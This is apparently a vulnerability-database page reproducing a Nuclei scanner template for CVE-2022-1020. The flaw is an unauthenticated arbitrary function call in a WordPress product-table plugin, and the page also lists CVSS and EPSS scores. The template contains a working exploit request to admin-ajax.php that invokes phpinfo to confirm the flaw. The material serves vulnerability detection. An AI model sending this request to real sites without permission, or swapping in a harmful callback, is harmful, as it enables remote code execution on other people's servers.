Lucene search

ProjectDiscoveryNUCLEI:CVE-2022-1020

HistoryApr 20, 2022 - 10:47 p.m.

WordPress WooCommerce <3.1.2 - Arbitrary Function Call

2022-04-2022:47:29

ProjectDiscovery

github.com

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.028 Low

EPSS

Percentile

90.8%

JSON

WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.

id: CVE-2022-1020

info:
  name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call
  author: Akincibor
  severity: critical
  description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
  impact: |
    It allows remote code execution on the affected system.
  remediation: |
    Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1020
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1020
    cwe-id: CWE-352
    epss-score: 0.01578
    epss-percentile: 0.8591
    cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: codeastrology
    product: woo_product_table
    framework: wordpress
  tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,unauth,codeastrology

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_key=a&perpose=update&callback=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
        part: body
# digest: 4b0a00483046022100d72b3184e8c6816aa9ec7e5ed2c9056be7eb0b109c6804c4cf0e15b36820e08502210085b3058836347638c5caed04b0a921408540b1f7a8c1643114113dda36e8ac99:922c64590222798bb761d5b6d8e72950

References

nvd.nist.gov/vuln/detail/CVE-2022-1020

wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.028 Low

EPSS

Percentile

90.8%

JSON

Related for NUCLEI:CVE-2022-1020